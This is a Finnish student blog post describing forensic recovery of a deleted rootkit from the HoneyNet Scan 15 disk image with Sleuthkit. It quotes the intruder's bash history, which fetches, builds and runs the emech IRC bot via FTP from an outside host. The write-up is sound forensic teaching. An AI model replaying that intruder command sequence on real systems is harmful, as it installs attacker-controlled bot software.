Ratkaise HoneyNet Scan of the Month 15

Tehtävänanto

Käsittele oikeita haittaohjelmia sisältävää kuvaa huolella, äläkä vie sitä tärkeille tuotantokoneille. Ratkaisut tehtävän selviävät levykuvasta, mitään ulkopuolisia järjestelmiä ei saa häiritä.

Raportoi, kuinka ratkaiset tehtävän.

Vastaa tehtävänannon kysymyksiin:
– “Show step by step how you identify and recover the deleted rootkit from the / partition.”
– What files make up the deleted rootkit?

Rootkitin etsintä

Aikaisempaa kokemusta rootkitin etsimisestä ei ole. Alkuun käynkin tutkimassa vinkkejä Tero Karvisen sivuilta, Googlettelen aihetta ja lataan levykuvan sivulta http://old.honeynet.org/scans/scan15/honeynet.tar.gz . Asennetaan myös Sleuthkit, jonka opettaja oli aikaisemmin neuvonut asennettavaksi. Tämä tehdään komennolla

sudo apt-get install  sleuthkit

Puretaan levykuva opettajan ohjeiden mukaan komennolla

tar -xf honeynet.tar.gz

Tehdään kansio ”honey”, minne mountaamme levykuvan

mkdir honey

Mountataan levykuva komennoilla

sudo mount -o loop honeypot.hda8.dd honey/

Suoritetaan opettajan neuvomat komennot, joilla saadaan lisää tietoa levykuvasta:

sudo mkdir allocated deleted

tsk_recover -a honeypot.hda8.dd allocated/

tsk_recover honeypot.hda8.dd deleted/

Tarkastellessa hakemistoja huomataan, ettei root hakemistoon päästä. Korotetaan oikeudet komennolla

sudo -s

Tarkastellaan rootin sisältöä komennolla

ls -a ja ls -al

Huomataan, että viimeisin muokkaus on .bash_historyssä. Avataan .bash_history nanolla:

exec tcsh
ls
mkdir /var/…
ls
cd /var/…
ftp ftp.home.ro
tar -zxvf emech-2.8.tar.gz
cd emech-2.8
./configure
y
make
make
make install
mv sample.set mech.set
pico mech.set
./mech
cd /etc
pico ftpaccess
ls
exit

Seuraamme Nanosta löytyvää polkua, mutta mitään ei löydy. Aloitan alusta, koska muut olivat jo löytäneet rootkitin ja totesivat minun tehneen jotain väärin.

Tehdään kaikki muuten samoin, mutta mountataan levykuva komennolla

sudo mount -o ”loop,nodev,noexec,ro” honeypot.hda8.dd honey/

Nyt huomamme että deleted osiossa on pakattu kansio lk.tgz. Puretaan kansio ja tarkastellaan sen sisältöä. Syntyvä kansio last näyttäisi olevan vuodelta 2001, eli olemme oikeilla jäljillä. Huomataan aikaisemmin Nanolla bongattu install tiedosto, avataan se Nanolla ja se paljastaa kansion etsimäksemme rootkitiksi! Ehkä…

Screenshot - 04182016 - 08:07:08 AM

Tutkiessamme kansiota, sieltä löytyy epäilyttävän oloisia tiedostoja, kuten esimerkiksi ”logclear” ja ”cleaner”. Näillä perusteilla uskon, että kaikki tiedostot kyseisessä kansiossa kuuluvat rootkittiin.

Olin varsin hukassa tehtävän kanssa ja ilman apua en olisi saanut tehtävää tehdyksi. Tehtävä oli kuitenkin varsin mielenkiintoinen. Vaikka vaikeuksia oli reilusti, joista osaa en edes kirjannut tähän vastaukseen, oli tehtävän suorittaminen varsin mukavaa alusta loppuun.

 

Mainokset

Vastaa

Täytä tietosi alle tai klikkaa kuvaketta kirjautuaksesi sisään:

WordPress.com-logo

Olet kommentoimassa WordPress.com -tilin nimissä. Log Out /  Muuta )

Google+ photo

Olet kommentoimassa Google+ -tilin nimissä. Log Out /  Muuta )

Twitter-kuva

Olet kommentoimassa Twitter -tilin nimissä. Log Out /  Muuta )

Facebook-kuva

Olet kommentoimassa Facebook -tilin nimissä. Log Out /  Muuta )

w

Muodostetaan yhteyttä palveluun %s